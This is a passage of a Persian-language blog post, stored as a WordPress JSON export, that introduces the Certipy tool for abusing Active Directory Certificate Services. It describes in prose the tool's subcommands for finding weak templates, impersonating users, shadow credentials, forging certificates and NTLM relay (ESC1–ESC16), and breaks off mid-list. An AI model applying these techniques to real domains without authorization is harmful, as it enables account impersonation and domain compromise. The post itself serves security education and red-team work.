{"id":19879,"date":"2025-07-15T09:30:42","date_gmt":"2025-07-15T06:00:42","guid":{"rendered":"https:\/\/liangroup.net\/blog\/?p=19879"},"modified":"2025-07-14T21:51:03","modified_gmt":"2025-07-14T18:21:03","slug":"a-detailed-guide-on-certipy","status":"publish","type":"post","link":"https:\/\/liangroup.net\/blog\/a-detailed-guide-on-certipy\/","title":{"rendered":"\u0631\u0627\u0647\u0646\u0645\u0627\u06cc \u062c\u0627\u0645\u0639 \u0627\u0628\u0632\u0627\u0631 Certipy"},"content":{"rendered":"<p><span style=\"font-size: 10pt\"><strong>\u0631\u0627\u0647\u0646\u0645\u0627\u06cc \u062c\u0627\u0645\u0639 \u0633\u0648\u0621\u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632<\/strong><strong> Active Directory <\/strong><strong>\u0628\u0627 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632<\/strong><strong> Certipy<\/strong><\/span><\/p>\n<p><span style=\"font-size: 10pt\">\u062f\u0631 \u0627\u06cc\u0646 \u0631\u0627\u0647\u0646\u0645\u0627\u06cc \u0633\u0648\u0621\u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 Active Directory \u0628\u0627 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 Certipy\u060c \u0628\u0631\u0631\u0633\u06cc \u062e\u0648\u0627\u0647\u06cc\u0645 \u06a9\u0631\u062f \u06a9\u0647 \u0686\u06af\u0648\u0646\u0647 \u0627\u0632 Certipy\u2014\u06cc\u06a9 \u0627\u0628\u0632\u0627\u0631 \u0645\u062c\u0645\u0648\u0639\u0647\u200c\u0627\u06cc \u062a\u0647\u0627\u062c\u0645\u06cc \u0648 \u062a\u062f\u0627\u0641\u0639\u06cc \u0637\u0631\u0627\u062d\u06cc \u0634\u062f\u0647 \u0628\u0631\u0627\u06cc \u0633\u0631\u0648\u06cc\u0633\u200c\u0647\u0627\u06cc \u06af\u0648\u0627\u0647\u06cc\u200c\u0646\u0627\u0645\u0647 Active Directory (AD CS)\u2014\u0628\u0631\u0627\u06cc \u0634\u0646\u0627\u0633\u0627\u06cc\u06cc \u067e\u06cc\u06a9\u0631\u0628\u0646\u062f\u06cc\u200c\u0647\u0627\u06cc \u0646\u0627\u062f\u0631\u0633\u062a \u0648 \u0633\u0648\u0621\u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 \u0627\u0644\u06af\u0648\u0647\u0627\u06cc CA \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u06a9\u0646\u06cc\u0645. \u0686\u0647 \u062f\u0631 \u062d\u0627\u0644 \u0647\u062f\u0641\u200c\u06af\u06cc\u0631\u06cc \u0628\u0631\u062f\u0627\u0631\u0647\u0627\u06cc \u062d\u0645\u0644\u0647 ESC1 \u062a\u0627 ESC16 \u0628\u0627\u0634\u06cc\u062f \u0648 \u0686\u0647 \u062f\u0631 \u062d\u0627\u0644 \u062c\u0639\u0644 \u06af\u0648\u0627\u0647\u06cc\u200c\u0646\u0627\u0645\u0647\u200c\u0647\u0627 \u0628\u0631\u0627\u06cc \u0627\u0641\u0632\u0627\u06cc\u0634 \u0627\u0645\u062a\u06cc\u0627\u0632 \u062f\u0633\u062a\u0631\u0633\u06cc \u0648 \u067e\u0627\u06cc\u062f\u0627\u0631\u06cc\u060c \u0627\u06cc\u0646 \u0645\u0642\u0627\u0644\u0647 \u0634\u0645\u0627 \u0631\u0627 \u06af\u0627\u0645 \u0628\u0647 \u06af\u0627\u0645 \u0627\u0632 \u0645\u0631\u0627\u062d\u0644 \u0636\u0631\u0648\u0631\u06cc\u060c \u0627\u0632 \u0634\u0646\u0627\u0633\u0627\u06cc\u06cc \u0627\u0644\u06af\u0648\u0647\u0627\u06cc \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631 \u062a\u0627 \u0628\u0647\u200c\u062f\u0633\u062a \u0622\u0648\u0631\u062f\u0646 \u062a\u0627\u06cc\u06cc\u062f \u0647\u0648\u06cc\u062a \u062f\u0627\u0645\u0646\u0647\u060c \u0631\u0627\u0647\u0646\u0645\u0627\u06cc\u06cc \u062e\u0648\u0627\u0647\u062f \u06a9\u0631\u062f.<\/span><\/p>\n<p><span style=\"font-size: 10pt\"><strong>\u0641\u0647\u0631\u0633\u062a \u0645\u0637\u0627\u0644\u0628<\/strong><\/span><\/p>\n<ol>\n<li><span style=\"font-size: 10pt\"><strong>\u0645\u0631\u0648\u0631\u06cc \u0628\u0631<\/strong><strong> Certipy<\/strong><\/span><\/li>\n<li><span style=\"font-size: 10pt\"><strong>\u0645\u0641\u0627\u0647\u06cc\u0645 \u06a9\u0644\u06cc\u062f\u06cc<\/strong><strong> ADCS<\/strong><\/span><\/li>\n<li><span style=\"font-size: 10pt\"><strong>\u0645\u0642\u062f\u0645\u0627\u062a<\/strong><\/span><\/li>\n<li><span style=\"font-size: 10pt\"><strong>\u0634\u0646\u0627\u0633\u0627\u06cc\u06cc \u0627\u0644\u06af\u0648\u0647\u0627\u06cc \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631<\/strong><\/span><\/li>\n<li><span style=\"font-size: 10pt\"><strong>\u0628\u0631\u0631\u0633\u06cc \u0627\u0645\u062a\u06cc\u0627\u0632\u0627\u062a \u062d\u0633\u0627\u0628<\/strong><\/span><\/li>\n<li><span style=\"font-size: 10pt\"><strong>\u062f\u0633\u062a\u06a9\u0627\u0631\u06cc \u062d\u0633\u0627\u0628\u200c\u0647\u0627<\/strong><\/span><\/li>\n<li><span style=\"font-size: 10pt\"><strong>\u062f\u0631\u062e\u0648\u0627\u0633\u062a \u06af\u0648\u0627\u0647\u06cc\u200c\u0646\u0627\u0645\u0647\u200c\u0647\u0627<\/strong><\/span><\/li>\n<li><span style=\"font-size: 10pt\"><strong>\u0627\u062d\u0631\u0627\u0632 \u0647\u0648\u06cc\u062a \u0627\u0632 \u0637\u0631\u06cc\u0642 \u06af\u0648\u0627\u0647\u06cc\u200c\u0646\u0627\u0645\u0647<\/strong><\/span><\/li>\n<li><span style=\"font-size: 10pt\"><strong>\u0645\u062f\u06cc\u0631\u06cc\u062a \u0627\u0639\u062a\u0628\u0627\u0631\u0647\u0627\u06cc \u067e\u0646\u0647\u0627\u0646<\/strong><\/span><\/li>\n<li><span style=\"font-size: 10pt\"><strong>\u062a\u063a\u06cc\u06cc\u0631 \u0627\u0644\u06af\u0648\u0647\u0627 \u0648<\/strong><strong> CA<\/strong><\/span><\/li>\n<li><span style=\"font-size: 10pt\"><strong>\u062c\u0639\u0644 \u0648 \u0631\u0644\u0647 \u06af\u0648\u0627\u0647\u06cc\u200c\u0646\u0627\u0645\u0647\u200c\u0647\u0627<\/strong><\/span><\/li>\n<li><span style=\"font-size: 10pt\"><strong>\u0645\u0642\u0627\u0628\u0644\u0647 \u0628\u0627 \u062a\u0647\u062f\u06cc\u062f\u0627\u062a<\/strong><\/span><\/li>\n<\/ol>\n<p><span style=\"font-size: 10pt\"><strong>\u0645\u0631\u0648\u0631\u06cc \u0628\u0631<\/strong><strong> Certipy<\/strong><\/span><\/p>\n<p><span style=\"font-size: 10pt\">Certipy \u06cc\u06a9 \u0627\u0628\u0632\u0627\u0631 \u062a\u062e\u0635\u0635\u06cc \u0627\u0633\u062a \u06a9\u0647 \u0628\u0631\u0627\u06cc \u0634\u0646\u0627\u0633\u0627\u06cc\u06cc \u0648 \u0633\u0648\u0621\u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 \u0636\u0639\u0641\u200c\u0647\u0627\u06cc \u0645\u0648\u062c\u0648\u062f \u062f\u0631 \u0633\u0631\u0648\u06cc\u0633\u200c\u0647\u0627\u06cc \u06af\u0648\u0627\u0647\u06cc\u200c\u0646\u0627\u0645\u0647 Active Directory Certificate Services (ADCS) \u0637\u0631\u0627\u062d\u06cc \u0634\u062f\u0647 \u0627\u0633\u062a. \u062f\u0631 \u062d\u0627\u0644\u06cc \u06a9\u0647 ADCS \u0646\u0642\u0634 \u062d\u06cc\u0627\u062a\u06cc \u062f\u0631 \u0627\u062d\u0631\u0627\u0632 \u0647\u0648\u06cc\u062a \u0645\u0628\u062a\u0646\u06cc \u0628\u0631 \u06af\u0648\u0627\u0647\u06cc\u200c\u0646\u0627\u0645\u0647 \u0648 \u0631\u0645\u0632\u0646\u06af\u0627\u0631\u06cc \u062f\u0631 \u0645\u062d\u06cc\u0637\u200c\u0647\u0627\u06cc \u0648\u06cc\u0646\u062f\u0648\u0632 \u062f\u0627\u0631\u062f\u060c \u067e\u06cc\u06a9\u0631\u0628\u0646\u062f\u06cc\u200c\u0647\u0627\u06cc \u0646\u0627\u062f\u0631\u0633\u062a \u0648 \u0627\u0644\u06af\u0648\u0647\u0627\u06cc \u0628\u06cc\u0634 \u0627\u0632 \u062d\u062f \u062f\u0633\u062a\u0631\u0633\u06cc\u200c\u067e\u0630\u06cc\u0631 \u0645\u06cc\u200c\u062a\u0648\u0627\u0646\u0646\u062f \u0622\u0646 \u0631\u0627 \u0628\u0647 \u06cc\u06a9 \u0628\u0631\u062f\u0627\u0631 \u062d\u0645\u0644\u0647 \u0628\u0627 \u062a\u0623\u062b\u06cc\u0631 \u0628\u0627\u0644\u0627 \u062a\u0628\u062f\u06cc\u0644 \u06a9\u0646\u0646\u062f.<\/span><\/p>\n<p><span style=\"font-size: 10pt\">\u062d\u0645\u0644\u0647\u200c\u06a9\u0646\u0646\u062f\u06af\u0627\u0646 \u0648 \u062a\u06cc\u0645\u200c\u0647\u0627\u06cc \u0642\u0631\u0645\u0632 \u0645\u06cc\u200c\u062a\u0648\u0627\u0646\u0646\u062f \u0627\u0632 Certipy \u0628\u0631\u0627\u06cc \u0634\u0646\u0627\u0633\u0627\u06cc\u06cc \u0627\u06cc\u0646 \u067e\u06cc\u06a9\u0631\u0628\u0646\u062f\u06cc\u200c\u0647\u0627\u06cc \u0646\u0627\u062f\u0631\u0633\u062a\u060c \u0627\u0641\u0632\u0627\u06cc\u0634 \u0627\u0645\u062a\u06cc\u0627\u0632\u0627\u062a\u060c \u062c\u0639\u0644 \u0647\u0648\u06cc\u062a \u06a9\u0627\u0631\u0628\u0631\u0627\u0646 \u0648 \u062f\u0633\u062a\u0631\u0633\u06cc \u067e\u0627\u06cc\u062f\u0627\u0631 \u0628\u0647 \u062f\u0627\u0645\u0646\u0647 \u0628\u062f\u0648\u0646 \u0646\u06cc\u0627\u0632 \u0628\u0647 \u0631\u0645\u0632 \u0639\u0628\u0648\u0631 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u06a9\u0646\u0646\u062f. \u0627\u06cc\u0646 \u0627\u0645\u0631 \u0627\u0632 \u0637\u0631\u06cc\u0642 \u0645\u0633\u06cc\u0631\u0647\u0627\u06cc \u0633\u0648\u0621\u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0634\u0646\u0627\u062e\u062a\u0647 \u0634\u062f\u0647\u200c\u0627\u06cc \u06a9\u0647 \u0645\u0639\u0645\u0648\u0644\u0627\u064b \u0628\u0647 \u0635\u0648\u0631\u062a ESC1 \u062a\u0627 ESC16 \u062f\u0633\u062a\u0647\u200c\u0628\u0646\u062f\u06cc \u0645\u06cc\u200c\u0634\u0648\u0646\u062f\u060c \u0642\u0627\u0628\u0644 \u0627\u0646\u062c\u0627\u0645 \u0627\u0633\u062a. \u0627\u06cc\u0646 \u0645\u0633\u06cc\u0631\u0647\u0627 \u0645\u0631\u0628\u0648\u0637 \u0628\u0647 \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u06cc\u200c\u0647\u0627\u06cc \u062e\u0627\u0635 \u062f\u0631 \u0637\u0631\u0627\u062d\u06cc \u0627\u0644\u06af\u0648\u0647\u0627\u060c \u0645\u062c\u0648\u0632\u0647\u0627 \u0648 \u0645\u062f\u0644\u200c\u0647\u0627\u06cc \u0627\u0639\u062a\u0645\u0627\u062f CA \u0647\u0633\u062a\u0646\u062f.<\/span><\/p>\n<p><span style=\"font-size: 10pt\"><strong>\u062f\u0633\u062a\u0648\u0631\u0627\u062a \u0648 \u062a\u06a9\u0646\u06cc\u06a9\u200c\u0647\u0627\u06cc \u06a9\u0644\u06cc\u062f\u06cc<\/strong><strong> Certipy<\/strong><\/span><\/p>\n<p><span style=\"font-size: 10pt\">Certipy \u0627\u0632 \u062f\u0633\u062a\u0648\u0631\u0627\u062a \u0645\u062e\u062a\u0644\u0641\u06cc \u067e\u0634\u062a\u06cc\u0628\u0627\u0646\u06cc \u0645\u06cc\u200c\u06a9\u0646\u062f \u06a9\u0647 \u0647\u0631 \u06a9\u062f\u0627\u0645 \u0628\u0647 \u0645\u0633\u06cc\u0631\u0647\u0627\u06cc \u062e\u0627\u0635 \u062d\u0645\u0644\u0647 \u062f\u0631 ADCS \u0627\u062e\u062a\u0635\u0627\u0635 \u062f\u0627\u0631\u0646\u062f:<\/span><\/p>\n<ul>\n<li><span style=\"font-size: 10pt\"><strong>find<\/strong> \u2013 \u067e\u06cc\u06a9\u0631\u0628\u0646\u062f\u06cc AD CS \u0631\u0627 \u0628\u0631\u0631\u0633\u06cc \u06a9\u0631\u062f\u0647 \u0648 \u0645\u0631\u0627\u062c\u0639 \u06af\u0648\u0627\u0647\u06cc\u200c\u0646\u0627\u0645\u0647\u200c\u0647\u0627\u060c \u0627\u0644\u06af\u0648\u0647\u0627 \u0648 \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u06cc\u200c\u0647\u0627\u06cc \u0627\u062d\u062a\u0645\u0627\u0644\u06cc ESC \u0631\u0627 \u0634\u0646\u0627\u0633\u0627\u06cc\u06cc \u0645\u06cc\u200c\u06a9\u0646\u062f.<\/span><\/li>\n<li><span style=\"font-size: 10pt\"><strong>account<\/strong> \u2013 \u0648\u06cc\u0698\u06af\u06cc\u200c\u0647\u0627\u06cc \u062d\u0633\u0627\u0628 \u06a9\u0627\u0631\u0628\u0631 \u06cc\u0627 \u0631\u0627\u06cc\u0627\u0646\u0647 \u0631\u0627 \u0628\u0631\u0627\u06cc \u06af\u0648\u0627\u0647\u06cc\u200c\u0646\u0627\u0645\u0647\u200c\u0647\u0627 \u0645\u062f\u06cc\u0631\u06cc\u062a \u0645\u06cc\u200c\u06a9\u0646\u062f\u060c \u0627\u0632 \u062c\u0645\u0644\u0647 \u062a\u0646\u0638\u06cc\u0645 SPN\u200c\u0647\u0627\u060c UPN\u200c\u0647\u0627 \u0648 \u0627\u06cc\u062c\u0627\u062f \u062d\u0633\u0627\u0628\u200c\u0647\u0627\u06cc \u0645\u0627\u0634\u06cc\u0646 \u0628\u0631\u0627\u06cc \u062d\u0645\u0644\u0627\u062a \u067e\u06cc\u0686\u06cc\u062f\u0647 \u0645\u0628\u062a\u0646\u06cc \u0628\u0631 \u06af\u0648\u0627\u0647\u06cc\u200c\u0646\u0627\u0645\u0647.<\/span><\/li>\n<li><span style=\"font-size: 10pt\"><strong>req<\/strong> \u2013 \u062f\u0631\u062e\u0648\u0627\u0633\u062a \u06af\u0648\u0627\u0647\u06cc \u0627\u0632 \u06cc\u06a9 CA\u060c \u062a\u0639\u06cc\u06cc\u0646 \u0627\u0644\u06af\u0648 \u0648 \u0646\u0627\u0645 CA\u060c \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 \u0627\u0639\u062a\u0628\u0627\u0631\u0647\u0627\u06cc \u062c\u0627\u06cc\u06af\u0632\u06cc\u0646\u060c \u067e\u0634\u062a\u06cc\u0628\u0627\u0646\u06cc \u0627\u0632 RPC\u060c DCOM \u06cc\u0627 HTTP(S) \u0648 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 certipy req \u0628\u0631\u0627\u06cc \u0633\u0648\u0621\u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 \u0627\u0644\u06af\u0648\u0647\u0627 \u0628\u0647 \u0645\u0646\u0638\u0648\u0631 \u062c\u0639\u0644 \u0647\u0648\u06cc\u062a.<\/span><\/li>\n<li><span style=\"font-size: 10pt\"><strong>auth<\/strong> \u2013 \u0627\u062d\u0631\u0627\u0632 \u0647\u0648\u06cc\u062a \u0628\u0627 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 \u06cc\u06a9 \u06af\u0648\u0627\u0647\u06cc\u200c\u0646\u0627\u0645\u0647 (PFX) \u0628\u0631\u0627\u06cc \u062f\u0633\u062a\u0631\u0633\u06cc \u0628\u0647 \u062f\u0627\u0645\u0646\u0647 \u0627\u0632 \u0637\u0631\u06cc\u0642 Kerberos PKINIT \u06cc\u0627 Schannel \u0628\u0647 LDAP\u060c \u062f\u0631\u06cc\u0627\u0641\u062a TGT \u0648 \u0647\u0634 NTLM.<\/span><\/li>\n<li><span style=\"font-size: 10pt\"><strong>shadow<\/strong> \u2013 \u0627\u0646\u062c\u0627\u0645 \u062d\u0645\u0644\u0647 \u0627\u0639\u062a\u0628\u0627\u0631\u0647\u0627\u06cc \u067e\u0646\u0647\u0627\u0646 \u0628\u0631\u0627\u06cc \u0627\u06cc\u062c\u0627\u062f \u06cc\u06a9 \u0627\u0639\u062a\u0628\u0627\u0631 \u0645\u0631\u062a\u0628\u0637 \u0628\u0627 \u06af\u0648\u0627\u0647\u06cc\u200c\u0646\u0627\u0645\u0647 \u0631\u0648\u06cc \u06cc\u06a9 \u06a9\u0627\u0631\u0628\u0631\u060c \u06a9\u0647 \u0627\u0645\u06a9\u0627\u0646 \u0627\u062d\u0631\u0627\u0632 \u0647\u0648\u06cc\u062a \u0627\u0632 \u0637\u0631\u06cc\u0642 \u06af\u0648\u0627\u0647\u06cc\u200c\u0646\u0627\u0645\u0647 \u0631\u0627 \u0641\u0631\u0627\u0647\u0645 \u0645\u06cc\u200c\u06a9\u0646\u062f.<\/span><\/li>\n<li><span style=\"font-size: 10pt\"><strong>Template<\/strong> \u2013 \u0645\u062f\u06cc\u0631\u06cc\u062a \u0627\u0634\u06cc\u0627\u0621 \u0627\u0644\u06af\u0648\u06cc \u06af\u0648\u0627\u0647\u06cc\u200c\u0646\u0627\u0645\u0647 \u062f\u0631 AD\u060c \u0627\u0632 \u062c\u0645\u0644\u0647 \u0627\u0633\u062a\u062e\u0631\u0627\u062c\u060c \u062a\u063a\u06cc\u06cc\u0631 \u0648 \u0628\u0627\u0632\u06cc\u0627\u0628\u06cc \u067e\u06cc\u06a9\u0631\u0628\u0646\u062f\u06cc\u200c\u0647\u0627\u06cc \u0627\u0644\u06af\u0648\u060c \u06a9\u0647 \u0628\u0631\u0627\u06cc \u0633\u0646\u0627\u0631\u06cc\u0648\u0647\u0627\u06cc\u06cc \u0645\u0627\u0646\u0646\u062f ESC4 \u0645\u0641\u06cc\u062f \u0627\u0633\u062a.<\/span><\/li>\n<li><span style=\"font-size: 10pt\"><strong>ca<\/strong> \u2013 \u0645\u062f\u06cc\u0631\u06cc\u062a \u062a\u0646\u0638\u06cc\u0645\u0627\u062a CA \u0628\u0631\u0627\u06cc \u0641\u0639\u0627\u0644\/\u063a\u06cc\u0631\u0641\u0639\u0627\u0644 \u06a9\u0631\u062f\u0646 \u0627\u0644\u06af\u0648\u0647\u0627\u060c \u062a\u0627\u06cc\u06cc\u062f\/\u0631\u062f \u062f\u0631\u062e\u0648\u0627\u0633\u062a\u200c\u0647\u0627 \u0648 \u0627\u0641\u0632\u0648\u062f\u0646\/\u062d\u0630\u0641 \u0645\u062f\u06cc\u0631\u0627\u0646 CA.<\/span><\/li>\n<li><span style=\"font-size: 10pt\"><strong>forge<\/strong> \u2013 \u062c\u0639\u0644 \u06af\u0648\u0627\u0647\u06cc\u200c\u0646\u0627\u0645\u0647\u200c\u0647\u0627 \u0628\u0627 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 \u06a9\u0644\u06cc\u062f \u062e\u0635\u0648\u0635\u06cc \u06cc\u06a9 CA \u0646\u0641\u0648\u0630\u0634\u062f\u0647 \u0628\u0631\u0627\u06cc \u0627\u06cc\u062c\u0627\u062f \u06af\u0648\u0627\u0647\u06cc\u200c\u0646\u0627\u0645\u0647\u200c\u0647\u0627\u06cc \u062f\u0644\u062e\u0648\u0627\u0647\u060c \u06a9\u0647 \u0628\u0631\u0627\u06cc \u067e\u0627\u06cc\u062f\u0627\u0631\u06cc \u0645\u0641\u06cc\u062f \u0627\u0633\u062a \u0627\u06af\u0631 \u06cc\u06a9 CA \u0631\u06cc\u0634\u0647 \u06cc\u0627 \u062a\u062d\u062a\u200c\u0627\u0644\u062a\u062d\u0627\u0642 \u0646\u0641\u0648\u0630 \u06a9\u0631\u062f\u0647 \u0628\u0627\u0634\u062f.<\/span><\/li>\n<li><span style=\"font-size: 10pt\"><strong>relay<\/strong> \u2013 \u0627\u0646\u062c\u0627\u0645 \u062d\u0645\u0644\u0647 NTLM relay targeting \u0628\u0647 \u0648\u0627\u0633\u0637\u0647 \u0646\u0642\u0627\u0637 \u067e\u0627\u06cc\u0627\u0646\u06cc AD CS HTTP(S) \u06cc\u0627 RPC \u0628\u0631\u0627\u06cc \u062f\u0631\u06cc\u0627\u0641\u062a \u06af\u0648\u0627\u0647\u06cc\u200c\u0646\u0627\u0645\u0647 \u0635\u0627\u062f\u0631 \u0634\u062f\u0647 \u0628\u0631\u0627\u06cc \u0642\u0631\u0628\u0627\u0646\u06cc\u060c \u06a9\u0647 \u062d\u0645\u0644\u0627\u062a ESC8 \u0648 ESC11 \u0631\u0627 \u0628\u0647 \u0637\u0648\u0631 \u062e\u0648\u062f\u06a9\u0627\u0631 \u0627\u0646\u062c\u0627\u0645 \u0645\u06cc\u200c\u062f\u0647\u062f.<\/span><\/li>\n<\/ul>\n<p><span style=\"font-size: 10pt\"><strong>\u0686\u0631\u0627 \u0627\u06cc\u0646 \u062a\u06a9\u0646\u06cc\u06a9\u200c\u0647\u0627 \u06a9\u0627\u0631 \u0645\u06cc\u200c\u06a9\u0646\u0646\u062f\u061f<\/strong><\/span><\/p>\n<p><span style=\"font-size: 10pt\">\u0627\u06cc\u0646 \u062a\u06a9\u0646\u06cc\u06a9\u200c\u0647\u0627 \u0628\u0647 \u062c\u0627\u06cc \u0627\u062a\u06a9\u0627 \u0628\u0647 \u0633\u0648\u0621\u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 \u06a9\u062f\u060c \u0628\u0631 \u0633\u0648\u0621\u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 \u0627\u0639\u062a\u0645\u0627\u062f \u0648 \u0633\u06cc\u0627\u0633\u062a\u200c\u0647\u0627\u06cc \u0636\u0639\u06cc\u0641 \u062a\u06a9\u06cc\u0647 \u062f\u0627\u0631\u0646\u062f:<\/span><\/p>\n<ul>\n<li><span style=\"font-size: 10pt\"><strong>\u0627\u0639\u062a\u0645\u0627\u062f<\/strong><strong> CA <\/strong><strong>\u0628\u0647 \u0627\u062d\u0631\u0627\u0632 \u0647\u0648\u06cc\u062a\u060c \u0646\u0647 \u0647\u0648\u06cc\u062a \u0648\u0627\u0642\u0639\u06cc<\/strong> \u2013 \u0627\u06af\u0631 \u062f\u0631\u062e\u0648\u0627\u0633\u062a \u0645\u0639\u062a\u0628\u0631 \u0628\u0647 \u0646\u0638\u0631 \u0628\u0631\u0633\u062f\u060c \u0645\u0645\u06a9\u0646 \u0627\u0633\u062a \u06af\u0648\u0627\u0647\u06cc\u200c\u0646\u0627\u0645\u0647\u200c\u0627\u06cc \u0628\u0647 \u062d\u0645\u0644\u0647\u200c\u06a9\u0646\u0646\u062f\u0647 \u0635\u0627\u062f\u0631 \u0634\u0648\u062f.<\/span><\/li>\n<li><span style=\"font-size: 10pt\"><strong>\u067e\u06cc\u06a9\u0631\u0628\u0646\u062f\u06cc \u0646\u0627\u062f\u0631\u0633\u062a \u0627\u0644\u06af\u0648\u0647\u0627<\/strong> \u2013 \u0627\u062c\u0627\u0632\u0647 \u0628\u0647 \u0627\u062d\u0631\u0627\u0632 \u0647\u0648\u06cc\u062a \u0645\u0634\u062a\u0631\u06cc \u0648 \u06a9\u0646\u062a\u0631\u0644 SAN\u060c \u06a9\u0647 \u0645\u0648\u062c\u0628 \u062c\u0639\u0644 \u0647\u0648\u06cc\u062a \u0645\u06cc\u200c\u0634\u0648\u062f.<\/span><\/li>\n<li><span style=\"font-size: 10pt\"><strong>\u0627\u0639\u062a\u0628\u0627\u0631\u0647\u0627\u06cc \u067e\u0646\u0647\u0627\u0646<\/strong> \u2013 \u0648\u0627\u0631\u062f \u06a9\u0631\u062f\u0646 \u0627\u0639\u062a\u0628\u0627\u0631\u0647\u0627\u06cc \u062c\u0627\u06cc\u06af\u0632\u06cc\u0646 \u0628\u0647 \u0635\u0648\u0631\u062a \u067e\u0646\u0647\u0627\u0646\u06cc\u060c \u06a9\u0647 \u0627\u0632 \u0639\u0628\u0648\u0631 \u0627\u0632 \u0631\u0645\u0632 \u0639\u0628\u0648\u0631 \u0648 MFA \u062c\u0644\u0648\u06af\u06cc\u0631\u06cc \u0645\u06cc\u200c\u06a9\u0646\u062f.<\/span><\/li>\n<li><span style=\"font-size: 10pt\"><strong>\u0627\u062d\u0631\u0627\u0632 \u0647\u0648\u06cc\u062a \u0645\u0628\u062a\u0646\u06cc \u0628\u0631 \u06af\u0648\u0627\u0647\u06cc\u200c\u0646\u0627\u0645\u0647\u060c \u0639\u0628\u0648\u0631 \u0627\u0632 \u0631\u0645\u0632 \u0639\u0628\u0648\u0631<\/strong> \u2013 \u062f\u0633\u062a\u0631\u0633\u06cc \u0628\u0647 \u0648\u0631\u0648\u062f \u062f\u0627\u0645\u0646\u0647 \u0628\u062f\u0648\u0646 \u0646\u06cc\u0627\u0632 \u0628\u0647 \u0631\u0645\u0632 \u0639\u0628\u0648\u0631 \u0647\u062f\u0641.<\/span><\/li>\n<li><span style=\"font-size: 10pt\"><strong>\u0646\u0642\u0634\u200c\u0647\u0627\u06cc \u0642\u062f\u0631\u062a\u0645\u0646\u062f<\/strong><strong> CA<\/strong> \u2013 \u0627\u0641\u0633\u0631\u0627\u0646 \u06af\u0648\u0627\u0647\u06cc\u200c\u0646\u0627\u0645\u0647 \u0648 \u0645\u062f\u06cc\u0631\u0627\u0646 CA \u0645\u06cc\u200c\u062a\u0648\u0627\u0646\u0646\u062f \u06af\u0648\u0627\u0647\u06cc\u200c\u0646\u0627\u0645\u0647 \u0628\u0631\u0627\u06cc \u0647\u0631 \u06a9\u0633\u06cc \u0635\u0627\u062f\u0631 \u06a9\u0646\u0646\u062f \u06a9\u0647 \u062e\u0637\u0631 \u062a\u0635\u0627\u062d\u0628 \u062f\u0627\u0645\u0646\u0647 \u0631\u0627 \u0628\u0647 \u0647\u0645\u0631\u0627\u0647 \u062f\u0627\u0631\u062f.<\/span><\/li>\n<\/ul>\n<p><span style=\"font-size: 10pt\"><strong>\u0645\u0641\u0627\u0647\u06cc\u0645 \u06a9\u0644\u06cc\u062f\u06cc<\/strong><strong> ADCS<\/strong><\/span><\/p>\n<p><span style=\"font-size: 10pt\">ADCS \u06cc\u06a9 \u0633\u062a\u0648\u0646 \u0641\u0642\u0631\u0627\u062a \u0628\u0631\u0627\u06cc \u062a\u0623\u06cc\u06cc\u062f \u0647\u0648\u06cc\u062a \u0648 \u0627\u0631\u062a\u0628\u0627\u0637\u0627\u062a \u0627\u0645\u0646 \u0627\u0633\u062a (\u0628\u0631\u0627\u06cc \u0645\u062b\u0627\u0644 \u06a9\u0627\u0631\u062a\u200c\u0647\u0627\u06cc \u0647\u0648\u0634\u0645\u0646\u062f\u060c TLS\u060c \u062f\u0633\u062a\u0631\u0633\u06cc VPN\u060c \u0631\u0645\u0632\u0646\u06af\u0627\u0631\u06cc \u0627\u06cc\u0645\u06cc\u0644) \u0648 \u0647\u0645\u0686\u0646\u06cc\u0646 \u0647\u062f\u0641 \u0627\u0631\u0632\u0634\u0645\u0646\u062f\u06cc \u0628\u0631\u0627\u06cc \u062d\u0645\u0644\u0647\u200c\u06a9\u0646\u0646\u062f\u06af\u0627\u0646 \u0627\u0633\u062a. \u0632\u06cc\u0631\u0627 ADCS \u0628\u0647 \u0637\u0648\u0631 \u0639\u0645\u06cc\u0642 \u0628\u0627 Active Directory \u06cc\u06a9\u067e\u0627\u0631\u0686\u0647 \u0627\u0633\u062a \u0648 \u062f\u0631 \u0633\u0631\u0627\u0633\u0631 \u062f\u0627\u0645\u0646\u0647 \u0628\u0647 \u0637\u0648\u0631 \u0636\u0645\u0646\u06cc \u0628\u0647 \u0622\u0646 \u0627\u0639\u062a\u0645\u0627\u062f \u0645\u06cc\u200c\u0634\u0648\u062f.<\/span><\/p>\n<p><span style=\"font-size: 10pt\"><strong>\u0686\u0631\u0627<\/strong><strong> ADCS <\/strong><strong>\u06cc\u06a9 \u0633\u0637\u062d \u062d\u0645\u0644\u0647 \u0627\u0633\u062a\u061f<\/strong><\/span><\/p>\n<p><span style=\"font-size: 10pt\">\u067e\u06cc\u06a9\u0631\u0628\u0646\u062f\u06cc \u0646\u0627\u062f\u0631\u0633\u062a \u062f\u0631 \u0627\u0644\u06af\u0648\u0647\u0627\u06cc \u06af\u0648\u0627\u0647\u06cc\u200c\u0646\u0627\u0645\u0647 \u06cc\u0627 \u062a\u0646\u0638\u06cc\u0645\u0627\u062a CA \u0645\u06cc\u200c\u062a\u0648\u0627\u0646\u062f \u062d\u0645\u0644\u0627\u062a \u0645\u062e\u062a\u0644\u0641\u06cc \u0631\u0627 \u0641\u0639\u0627\u0644 \u06a9\u0646\u062f:<\/span><\/p>\n<ul>\n<li><span style=\"font-size: 10pt\"><strong>\u0627\u0644\u06af\u0648\u0647\u0627\u06cc 